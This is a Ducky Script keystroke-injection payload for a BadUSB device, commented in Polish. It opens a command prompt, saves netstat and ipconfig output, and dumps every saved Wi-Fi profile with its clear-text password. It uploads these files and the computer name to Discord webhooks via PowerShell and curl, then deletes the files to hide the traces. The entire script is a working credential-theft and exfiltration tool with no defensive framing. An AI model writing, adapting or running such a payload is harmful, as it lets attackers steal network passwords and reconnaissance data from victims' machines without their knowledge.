REM /----------------------------------\
REM|        CODE BY SMOCZEK_BK          |
REM \----------------------------------/  

DELAY 500
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING set "DeviceName=%COMPUTERNAME%"
ENTER

REM Pobierz listę połączeń sieciowych (netstat) i zapisz do pliku tekstowego
DELAY 1000
STRING netstat -ano > "%temp%\netstat_%DeviceName%.txt" & powershell -c "(New-Object System.Net.WebClient).UploadFile('WEBHOOK DLA NETSTAT', '%temp%\netstat_%DeviceName%.txt'); Remove-Item '%temp%\netstat_%DeviceName%.txt'"
ENTER

REM Pobierz informacje o konfiguracji sieciowej (ipconfig) i zapisz do pliku tekstowego
DELAY 1000
STRING ipconfig > "%temp%\ipconfig_output_%DeviceName%.txt" & powershell -c "(New-Object System.Net.WebClient).UploadFile('WEBHOOK DLA IPCONFIG', '%temp%\ipconfig_output_%DeviceName%.txt'); Remove-Item '%temp%\ipconfig_output_%DeviceName%.txt'"
ENTER

REM Pobierz listę zapisanych profili sieci Wi-Fi i ich hasła, a następnie zapisz do pliku tekstowego
DELAY 1000
STRING for /f "tokens=2 delims=:" %i in ('netsh wlan show profiles ^| findstr "All User Profile"') do echo %i >> "%USERPROFILE%\Desktop\wifi_passwords_%DeviceName%.txt" & netsh wlan show profile name=%i key=clear >> "%USERPROFILE%\Desktop\wifi_passwords_%DeviceName%.txt"
ENTER

REM Wyślij plik z informacjami o zapisanych hasłach Wi-Fi na serwer Discord
DELAY 1500
STRING curl -X POST -F "file=@%USERPROFILE%\Desktop\wifi_passwords_%DeviceName%.txt" "WEBHOOK DLA HASEŁ WIFI" & DELAY 1000 & del "%USERPROFILE%\Desktop\wifi_passwords_%DeviceName%.txt"
ENTER

REM Wyślij nazwę użytkownika na serwer Discord
DELAY 1000
STRING curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Nazwa użytkownika: **%DeviceName%**\"}" "WEBHOOK DLA NAZWY"
ENTER

REM Usuń plik z informacjami o połączeniach sieciowych (netstat)
DELAY 1000
STRING del "%temp%\netstat_%DeviceName%.txt"
ENTER

REM Usuń plik z informacjami o konfiguracji sieciowej (ipconfig)
DELAY 1000
STRING del "%temp%\ipconfig_output_%DeviceName%.txt"
ENTER

REM Zakończ wiersz poleceń
DELAY 300
STRING exit
ENTER
